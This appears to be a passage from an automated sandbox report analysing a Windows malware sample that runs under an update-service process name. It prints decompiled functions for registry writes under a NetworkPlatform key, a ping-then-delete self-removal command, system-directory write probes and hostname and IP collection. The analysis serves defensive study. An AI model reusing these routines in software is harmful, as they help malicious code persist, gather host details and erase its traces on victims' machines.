                                                0x00255aef
                                                0x00000000
                                                0x00255af1
                                                0x00255af4
                                                0x00255af6
                                                0x00255b02
                                                0x00255b02
                                                0x00255aef
                                                0x00255ae8
                                                0x00255abd
                                                0x00255ab3
                                                0x00255a7c
                                                0x00255a7c
                                                0x00255a81
                                                0x00255a81

                                                APIs
                                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location,00000000,00020019,00000000), ref: 00255A72
                                                • RegQueryValueExA.ADVAPI32(00000000,LastBackup,00000000,00000000,00000000,00000700), ref: 00255AA4
                                                • RegQueryValueExA.ADVAPI32(00000000,LastBackup,00000000,00000000,00000000,00000000), ref: 00255AE0
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00255AF6
                                                Strings
                                                • LastBackup, xrefs: 00255A9C, 00255AD8
                                                • Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location, xrefs: 00255A68
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: QueryValue$CloseOpen
                                                • String ID: LastBackup$Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location
                                                • API String ID: 1586453840-3284959219
                                                • Opcode ID: ccf20d260b35e4d0fb1277186239911baed4193086bc383eefc74786ced2c8aa
                                                • Instruction ID: 9b44b97d3b888e6cc85a7d32f012c3516047a69ec3b4d6ea6c167f9f8f919c20
                                                • Opcode Fuzzy Hash: ccf20d260b35e4d0fb1277186239911baed4193086bc383eefc74786ced2c8aa
                                                • Instruction Fuzzy Hash: F8110A75A50209BBEF20CF90EC5AFADBBBCAF04705F104195FD04E61A0E7B1AA64DA54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 002562A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67processsynchronizationCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 82%
                                                			E002562A0(void* __edi, void* __esi) {
				signed int _v8;
				short _v532;
				short _v1052;
				struct _PROCESS_INFORMATION _v1068;
				struct _STARTUPINFOW _v1140;
				signed int _t16;
				int _t33;
				void* _t39;
				signed int _t40;

				_t39 = __esi;
				_t38 = __edi;
				_t16 =  *0x271004; // 0x80aab37c
				_v8 = _t16 ^ _t40;
				E002596C0(__edi,  &_v1052, 0, 0x208);
				E002596C0(_t38,  &_v532, 0, 0x208);
				GetModuleFileNameW(0,  &_v532, 0x104);
				wsprintfW( &_v1052, L"cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c del /a /f \"%s\"",  &_v532);
				E002596C0(_t38,  &_v1140, 0, 0x44);
				_v1140.cb = 0x44;
				_v1140.dwFlags = 1;
				_v1140.wShowWindow = 5;
				asm("xorps xmm0, xmm0");
				asm("movups [ebp-0x428], xmm0"); // executed
				_t33 = CreateProcessW(0,  &_v1052, 0, 0, 0, 0x8000000, 0, 0,  &_v1140,  &_v1068); // executed
				if(_t33 != 0) {
					WaitForSingleObject(_v1068, 0);
				}
				return E00257097(_v8 ^ _t40, _t39);
			}












                                                0x002562a0
                                                0x002562a0
                                                0x002562a9
                                                0x002562b0
                                                0x002562c1
                                                0x002562d7
                                                0x002562ed
                                                0x00256306
                                                0x0025631a
                                                0x00256322
                                                0x00256331
                                                0x0025633b
                                                0x00256342
                                                0x0025636b
                                                0x00256372
                                                0x0025637a
                                                0x00256384
                                                0x00256384
                                                0x00256397

                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 002562ED
                                                • wsprintfW.USER32 ref: 00256306
                                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 00256372
                                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 00256384
                                                Strings
                                                • cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c del /a /f "%s", xrefs: 00256300
                                                • D, xrefs: 00256322
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: CreateFileModuleNameObjectProcessSingleWaitwsprintf
                                                • String ID: D$cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c del /a /f "%s"
                                                • API String ID: 774226019-3467615674
                                                • Opcode ID: d8ef50bf67cece194d27d14e410d31bf2708c57b9fe1d5931760556416c347f4
                                                • Instruction ID: 2cc4d688dc2c09fd6e7cdc71ee07f72d4bcb7b74ff0d45eb905a9d14396f221b
                                                • Opcode Fuzzy Hash: d8ef50bf67cece194d27d14e410d31bf2708c57b9fe1d5931760556416c347f4
                                                • Instruction Fuzzy Hash: 322106B1A4021CAADB20DB609C4AFD9737CAB14705F5441A5BB08E61D1EBB16AD88F58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 002568A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 91%
                                                			E002568A0(void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				char _v528;
				signed int _t11;
				void* _t23;
				signed int _t37;

				_t35 = __edi;
				_t11 =  *0x271004; // 0x80aab37c
				_v8 = _t11 ^ _t37;
				E002596C0(__edi,  &_v528, 0, 0x104);
				GetSystemDirectoryA( &_v528, 0x104);
				E002596C0(_t35,  &_v268, 0, 0x104);
				E00253D30( &_v268, "%s\\text.log",  &_v528);
				_t23 = CreateFileA( &_v268, 0x40000000, 1, 0, 2, 0, 0); // executed
				if(_t23 != 0xffffffff) {
					FindCloseChangeNotification(_t23); // executed
					DeleteFileA( &_v268); // executed
					return E00257097(_v8 ^ _t37, __esi);
				} else {
					return E00257097(_v8 ^ _t37, __esi);
				}
			}









                                                0x002568a0
                                                0x002568a9
                                                0x002568b0
                                                0x002568c1
                                                0x002568d5
                                                0x002568e9
                                                0x00256901
                                                0x0025691f
                                                0x00256928
                                                0x0025693b
                                                0x00256948
                                                0x0025695d
                                                0x0025692a
                                                0x00256939
                                                0x00256939

                                                APIs
                                                • GetSystemDirectoryA.KERNEL32 ref: 002568D5
                                                • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 0025691F
                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0025693B
                                                • DeleteFileA.KERNELBASE(?), ref: 00256948
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: File$ChangeCloseCreateDeleteDirectoryFindNotificationSystem
                                                • String ID: %s\text.log
                                                • API String ID: 204230347-1064321745
                                                • Opcode ID: 099c45838a03fdb215512049b48c236de0684b1f96a2269533ed1b8d529d8265
                                                • Instruction ID: 4c901c14de7f0b5808d3220f05f6b4e7b250a179cca4fc5b9c0ee1dd744a1fcb
                                                • Opcode Fuzzy Hash: 099c45838a03fdb215512049b48c236de0684b1f96a2269533ed1b8d529d8265
                                                • Instruction Fuzzy Hash: 4411A0B5A5020CABDF20EBA0AC4EFD9737C9B14705F500591FA09E71C2DAB16AD88F44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 002559D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 365 2559d0-255a0b RegCreateKeyExA 366 255a0d-255a27 RegSetValueExA 365->366 367 255a2f-255a34 365->367 368 255a35-255a43 RegCloseKey 366->368 369 255a29 RegCloseKey 366->369 369->367
                                                C-Code - Quality: 75%
                                                			E002559D0(char* _a4, char* _a8, int _a12) {
				void* _v8;
				int _v12;
				int _t12;
				long _t14;

				_v8 = 0;
				_v12 = 1;
				_t12 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows NT\\CurrentVersion\\NetworkPlatform\\Location", 0, 0, 0, 0xf003f, 0,  &_v8,  &_v12); // executed
				if(_t12 != 0) {
					L3:
					return 0;
				} else {
					_t14 = RegSetValueExA(_v8, _a4, _t12, 3, _a8, _a12); // executed
					_push(_v8);
					if(_t14 == 0) {
						RegCloseKey();
						return 1;
					} else {
						RegCloseKey();
						goto L3;
					}
				}
			}







                                                0x002559d9
                                                0x002559e4
                                                0x00255a03
                                                0x00255a0b
                                                0x00255a2f
                                                0x00255a34
                                                0x00255a0d
                                                0x00255a1c
                                                0x00255a22
                                                0x00255a27
                                                0x00255a35
                                                0x00255a43
                                                0x00255a29
                                                0x00255a29
                                                0x00000000
                                                0x00255a29
                                                0x00255a27

                                                APIs
                                                • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location,00000000,00000000,00000000,000F003F,00000000,00000000,?), ref: 00255A03
                                                • RegSetValueExA.KERNELBASE(00000000,00000001,00000000,00000003,?,?), ref: 00255A1C
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00255A29
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00255A35
                                                Strings
                                                • Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location, xrefs: 002559F9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Close$CreateValue
                                                • String ID: Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location
                                                • API String ID: 1009429713-4282255057
                                                • Opcode ID: 13d431bfc1266f2d14d254843e38d7d2cf6f82e193649cf30db99af879de0d67
                                                • Instruction ID: 7bf6298cbe547b5eaa8bd66a7e3265183600b94d7bb3d75a3a10b6d8f3175863
                                                • Opcode Fuzzy Hash: 13d431bfc1266f2d14d254843e38d7d2cf6f82e193649cf30db99af879de0d67
                                                • Instruction Fuzzy Hash: E4F0F935650208BBEF219F90EC4AFA97B7CEB08705F204594FE08A5190DAB29A64AA54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00255C40 Relevance: 7.5, APIs: 5, Instructions: 43fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00255C40(CHAR* __ecx, CHAR* __edx) {
				void* _t3;
				CHAR* _t7;
				CHAR* _t10;

				_t7 = __edx;
				_t10 = __ecx;
				DeleteFileA(__ecx); // executed
				DeleteFileA(_t7); // executed
				_t3 = CreateFileA(_t10, 0x80000000, 1, 0, 3, 0, 0); // executed
				if(_t3 != 0xffffffff) {
					L2:
					CloseHandle(_t3);
					return 0;
				} else {
					_t3 = CreateFileA(_t7, 0x80000000, 1, 0, 3, 0, 0); // executed
					if(_t3 == 0xffffffff) {
						return 1;
					} else {
						goto L2;
					}
				}
			}






                                                0x00255c48
                                                0x00255c4b
                                                0x00255c4e
                                                0x00255c51
                                                0x00255c69
                                                0x00255c6e
                                                0x00255c87
                                                0x00255c88
                                                0x00255c93
                                                0x00255c70
                                                0x00255c80
                                                0x00255c85
                                                0x00255c99
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00255c85

                                                APIs
                                                • DeleteFileA.KERNELBASE(?,00000000,00000000,?,00256ABD), ref: 00255C4E
                                                • DeleteFileA.KERNELBASE(?,?,00256ABD), ref: 00255C51
                                                • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00256ABD), ref: 00255C69
                                                • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00256ABD), ref: 00255C80
                                                • CloseHandle.KERNEL32(00000000,?,00256ABD), ref: 00255C88
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: File$CreateDelete$CloseHandle
                                                • String ID:
                                                • API String ID: 2260846778-0
                                                • Opcode ID: e115666c85602b2e17f7a2cd74800068f8fe6701f7c186a9c78b5a1d062aa3f6
                                                • Instruction ID: 3e88adb8dcd8bbe6771ddf615ba91db5d3a6a336f399e1e0b4b0e2ba31809882
                                                • Opcode Fuzzy Hash: e115666c85602b2e17f7a2cd74800068f8fe6701f7c186a9c78b5a1d062aa3f6
                                                • Instruction Fuzzy Hash: DCF0E53279032076F93016387CC6FAA175C8B85B32F340217F710BB0D18AF5785256A8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00255E20 Relevance: 6.1, APIs: 4, Instructions: 97networkCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 56%
                                                			E00255E20(void* __ebx, intOrPtr __ecx, void* __edi) {
				signed int _v8;
				char _v140;
				char _v268;
				char _v668;
				intOrPtr _v672;
				void* __esi;
				signed int _t22;
				char* _t24;
				intOrPtr* _t32;
				intOrPtr _t33;
				intOrPtr* _t43;
				intOrPtr* _t48;
				void* _t52;
				intOrPtr _t55;
				void* _t58;
				void* _t60;
				intOrPtr* _t62;
				signed int _t63;
				void* _t64;
				void* _t65;
				void* _t66;

				_t59 = __edi;
				_t22 =  *0x271004; // 0x80aab37c
				_v8 = _t22 ^ _t63;
				_t24 =  &_v668;
				_v672 = __ecx;
				__imp__#115(0x202, _t24);
				if(_t24 == 0) {
					E002596C0(__edi,  &_v268, _t24, 0x80);
					E002596C0(_t59,  &_v140, 0, 0x80);
					_t65 = _t64 + 0x18;
					gethostname( &_v268, 0x80); // executed
					_t32 =  &_v268;
					__imp__#52(_t32); // executed
					_t48 = _t32;
					if(_t48 != 0) {
						_t60 = 0;
						do {
							_t62 =  &_v140;
							_t52 = _t62 + 1;
							do {
								_t33 =  *_t62;
								_t62 = _t62 + 1;
							} while (_t33 != 0);
							_t61 = _t62 - _t52;
							__imp__#12( *((intOrPtr*)( *((intOrPtr*)(_t60 +  *((intOrPtr*)(_t48 + 0xc)))))));
							E0025BB0C( &_v140, 0x80 - _t62 - _t52,  *((intOrPtr*)(_t60 +  *((intOrPtr*)(_t48 + 0xc)))));
							_t66 = _t65 + 0xc;
							if( *((short*)(_t48 + 0xa)) +  *((intOrPtr*)( *((intOrPtr*)(_t48 + 0xc)) + _t60)) <  *_t48) {
								_t43 =  &_v140;
								_t58 = _t43 + 1;
								do {
									_t55 =  *_t43;
									_t43 = _t43 + 1;
								} while (_t55 != 0);
								goto L8;
							}
							break;
							L8:
							E0025BB0C( &_v140, 0x80 - _t43 - _t58, "_");
							_t60 = _t60 + 4;
							_t65 = _t66 + 0xc;
						} while (_t60 < 0x1c);
						E0025BAB2(_v672, 0x100,  &_v140);
					}
				}
				return E00257097(_v8 ^ _t63, _t61);
			}
























                                                0x00255e20
                                                0x00255e29
                                                0x00255e30
                                                0x00255e36
                                                0x00255e3c
                                                0x00255e48
                                                0x00255e50
                                                0x00255e63
                                                0x00255e76
                                                0x00255e7b
                                                0x00255e8a
                                                0x00255e90
                                                0x00255e97
                                                0x00255e9d
                                                0x00255ea1
                                                0x00255ea7
                                                0x00255eb0
                                                0x00255eb0
                                                0x00255eb6
                                                0x00255ec0
                                                0x00255ec0
                                                0x00255ec2
                                                0x00255ec3
                                                0x00255eca
                                                0x00255ed1
                                                0x00255ee7
                                                0x00255eef
                                                0x00255efb
                                                0x00255efd
                                                0x00255f03
                                                0x00255f06
                                                0x00255f06
                                                0x00255f08
                                                0x00255f09
                                                0x00000000
                                                0x00255f06
                                                0x00000000
                                                0x00255f0d
                                                0x00255f23
                                                0x00255f28
                                                0x00255f2b
                                                0x00255f2e
                                                0x00255f49
                                                0x00255f4e
                                                0x00255ea1
                                                0x00255f61

                                                APIs
                                                • WSAStartup.WS2_32(00000202,?), ref: 00255E48
                                                • gethostname.WS2_32(?,00000080), ref: 00255E8A
                                                • gethostbyname.WS2_32(?), ref: 00255E97
                                                • inet_ntoa.WS2_32(?), ref: 00255ED1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Startupgethostbynamegethostnameinet_ntoa
                                                • String ID:
                                                • API String ID: 2480646289-0
                                                • Opcode ID: 08ce0783fbef65355337c928abc3ac4a6c27ec65726b6478ed32e33c55462a8e
                                                • Instruction ID: 0607f83f65798cec1921aaaac4f4bbe6806e1e71a6826c035f9fda77f39cc800
                                                • Opcode Fuzzy Hash: 08ce0783fbef65355337c928abc3ac4a6c27ec65726b6478ed32e33c55462a8e
                                                • Instruction Fuzzy Hash: 3031BC729102199BDF208F64DC89FEA77ACAB05301F0081E5E98DD7151EE70AA9C8F58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00256BE0 Relevance: 6.1, APIs: 4, Instructions: 97registryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 83%
                                                			E00256BE0(char* __edx, char* _a4, int _a8, char* _a12, char _a16) {
				int _v8;
				signed int _v12;
				char _v20;
				void* _v32;
				int _v36;
				char* _v40;
				void* _v44;
				int _v48;
				void* __esi;
				void* __ebp;
				signed int _t26;
				long _t31;
				long _t35;
				char _t37;
				long _t41;
				char* _t43;
				char* _t45;
				char* _t48;
				int _t52;
				int _t54;
				signed int _t59;

				_push(0xfffffffe);
				_push(0x26f6d8);
				_push(E002593E0);
				_push( *[fs:0x0]);
				_t26 =  *0x271004; // 0x80aab37c
				_v12 = _v12 ^ _t26;
				_push(_t26 ^ _t59);
				 *[fs:0x0] =  &_v20;
				_t43 = __edx;
				_v44 = 0x80000002;
				_t54 = 0;
				_v36 = 0;
				_v8 = 0;
				_t31 = RegCreateKeyExA(0x80000002, __edx, 0, 0, 0, 0xf003f, 0,  &_v32,  &_v48); // executed
				if(_t31 == 0) {
					_t35 = RegOpenKeyExA(0x80000002, _t43, 0, 0x2001f,  &_v32); // executed
					if(_t35 == 0) {
						_t52 = _a8;
						if(_t52 <= 2) {
							_t45 = _a12;
							_t48 = _t45;
							_v40 =  &(_t48[1]);
							do {
								_t37 =  *_t48;
								_t48 =  &(_t48[1]);
							} while (_t37 != 0);
							RegSetValueExA(_v32, _a4, 0, _t52, _t45, _t48 - _v40 + 1); // executed
							_t54 =  ==  ? 1 : 0;
							goto L9;
						} else {
							if(_t52 == 4) {
								_t41 = RegSetValueExA(_v32, _a4, 0, _t52,  &_a16, _t52);
								if(_t41 == 0) {
									_t14 = _t41 + 1; // 0x1
									_t54 = _t14;
									L9:
									_v36 = _t54;
								}
							}
						}
					}
				}
				_v8 = 0xfffffffe;
				E00256CE1(0x80000002);
				 *[fs:0x0] = _v20;
				return _t54;
			}
























                                                0x00256be3
                                                0x00256be5
                                                0x00256bea
                                                0x00256bf5
                                                0x00256bfc
                                                0x00256c01
                                                0x00256c06
                                                0x00256c0a
                                                0x00256c10
                                                0x00256c17
                                                0x00256c1a
                                                0x00256c1c
                                                0x00256c1f
                                                0x00256c35
                                                0x00256c3d
                                                0x00256c4b
                                                0x00256c53
                                                0x00256c55
                                                0x00256c5b
                                                0x00256c7e
                                                0x00256c81
                                                0x00256c86
                                                0x00256c90
                                                0x00256c90
                                                0x00256c92
                                                0x00256c93
                                                0x00256ca8
                                                0x00256cb5
                                                0x00000000
                                                0x00256c5d
                                                0x00256c60
                                                0x00256c6f
                                                0x00256c77
                                                0x00256c79
                                                0x00256c79
                                                0x00256cb8
                                                0x00256cb8
                                                0x00256cb8
                                                0x00256c77
                                                0x00256c60
                                                0x00256c5b
                                                0x00256c53
                                                0x00256cbb
                                                0x00256cc2
                                                0x00256ccc
                                                0x00256cda

                                                APIs
                                                • RegCreateKeyExA.KERNELBASE(80000002,?,00000000,00000000,00000000,000F003F,00000000,002593E0,80AAB37C,80AAB37C,00000000,73B76980,?,002593E0,0026F6D8,000000FE), ref: 00256C35
                                                • RegOpenKeyExA.KERNELBASE(80000002,?,00000000,0002001F,002593E0,?,002593E0,0026F6D8,000000FE,?,00256FDB,Description,00000001,?,00000000), ref: 00256C4B
                                                • RegSetValueExA.ADVAPI32(002593E0,?,00000000,00256FDB,000000FE,00256FDB,?,002593E0,0026F6D8,000000FE,?,00256FDB,Description,00000001,?,00000000), ref: 00256C6F
                                                • RegSetValueExA.KERNELBASE(002593E0,?,00000000,00256FDB,?,?,?,002593E0,0026F6D8,000000FE,?,00256FDB,Description,00000001,?,00000000), ref: 00256CA8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Value$CreateOpen
                                                • String ID:
                                                • API String ID: 4052006930-0
                                                • Opcode ID: a9b705e561159220e5a1aca3ec47e93170a1ab57224e75fec982cf22680a6a4f
                                                • Instruction ID: c10b255c871747ff16df65685505f5aee8e57f5ec0dd87aa510f3b06b26c2f36
                                                • Opcode Fuzzy Hash: a9b705e561159220e5a1aca3ec47e93170a1ab57224e75fec982cf22680a6a4f
                                                • Instruction Fuzzy Hash: CE316D71A00209ABDB10CFA5DC88FEFBBBDEB89701F50816AF905A3261D7719915CB64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00256240 Relevance: 6.0, APIs: 4, Instructions: 42fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 65%
                                                			E00256240(CHAR* __ecx, void* __edx, long _a4) {
				long _v8;
				void* _t4;
				int _t7;
				void* _t14;
				void* _t18;

				_push(__ecx);
				_t14 = __edx;
				_v8 = 0;
				_t4 = CreateFileA(__ecx, 0x40000000, 2, 0, 2, 0x80, 0); // executed
				_t18 = _t4;
				if(_t18 == 0) {
					L3:
					return 0; // executed
				} else {
					_t7 = WriteFile(_t18, _t14, _a4,  &_v8, 0); // executed
					_push(_t18);
					if(_t7 != 0) {
						FindCloseChangeNotification(); // executed
						return 1;
					} else {
						CloseHandle();
						goto L3;
					}
				}
			}








                                                0x00256243
                                                0x00256259
                                                0x0025625b
                                                0x00256262
                                                0x00256268
                                                0x0025626c
                                                0x0025628a
                                                0x00256291
                                                0x0025626e
                                                0x00256279
                                                0x0025627f
                                                0x00256282
                                                0x00256292
                                                0x0025629f
                                                0x00256284
                                                0x00256284
                                                0x00000000
                                                0x00256284
                                                0x00256282

                                                APIs
                                                • CreateFileA.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000,?,00000000,?,?,00255DFD), ref: 00256262
                                                • WriteFile.KERNELBASE(00000000,00000000,00255DFD,00000000,00000000,?,40000000,00000002,00000000,00000002,00000080,00000000,?,00000000), ref: 00256279
                                                • CloseHandle.KERNEL32(00000000,?,40000000,00000002,00000000,00000002,00000080,00000000,?,00000000,?,?,00255DFD), ref: 00256284
                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,40000000,00000002,00000000,00000002,00000080,00000000,?,00000000,?,?,00255DFD), ref: 00256292
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: CloseFile$ChangeCreateFindHandleNotificationWrite
                                                • String ID:
                                                • API String ID: 2570977422-0
                                                • Opcode ID: c831ca9c7e3900d7dbb4fc765e2a2ca890d8c5fb793024027880a9bb36f71ff9
                                                • Instruction ID: 0d106706b34bbc0c779a464abc685a5464875258973f043b8eb748f1bb8be138
                                                • Opcode Fuzzy Hash: c831ca9c7e3900d7dbb4fc765e2a2ca890d8c5fb793024027880a9bb36f71ff9
                                                • Instruction Fuzzy Hash: 78F0B432151214BBDB304B45BC0EFDB7B6CDB85B21F008145FE08D6181AEB2594186E5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0025A427 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0025A427(signed int __ecx) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t14;
				intOrPtr _t18;
				signed int _t21;
				signed int _t27;
				intOrPtr _t29;
				intOrPtr _t30;

				_t23 = __ecx;
				_t9 =  *0x27393c; // 0x200
				_t29 = 3;
				if(_t9 != 0) {
					__eflags = _t9 - _t29;
					if(_t9 < _t29) {
						_t9 = _t29;
						goto L4;
					}
				} else {
					_t9 = 0x200;
					L4:
					 *0x27393c = _t9;
				}
				_t10 = E0025D3BF(_t23, _t9, 4); // executed
				 *0x273940 = _t10;
				E0025D2F4(0);
				if( *0x273940 != 0) {
					L8:
					_t27 = 0;
					__eflags = 0;
					_t30 = 0x272470;
					do {
						_t1 = _t30 + 0x20; // 0x272490
						E0025D7A8(_t23, __eflags, _t1, 0xfa0, 0);
						_t14 =  *0x273940; // 0x0
						 *((intOrPtr*)(_t14 + _t27 * 4)) = _t30;
						_t23 = (_t27 & 0x0000003f) * 0x30;
						_t18 =  *((intOrPtr*)( *((intOrPtr*)(0x273b90 + (_t27 >> 6) * 4)) + 0x18 + (_t27 & 0x0000003f) * 0x30));
						__eflags = _t18 - 0xffffffff;
						if(_t18 == 0xffffffff) {
							L12:
							 *((intOrPtr*)(_t30 + 0x10)) = 0xfffffffe;
						} else {
							__eflags = _t18 - 0xfffffffe;
							if(_t18 == 0xfffffffe) {
								goto L12;
							} else {
								__eflags = _t18;
								if(_t18 == 0) {
									goto L12;
								}
							}
						}
						_t30 = _t30 + 0x38;
						_t27 = _t27 + 1;
						__eflags = _t30 - 0x272518;
					} while (__eflags != 0);
					__eflags = 0;
					return 0;
				} else {
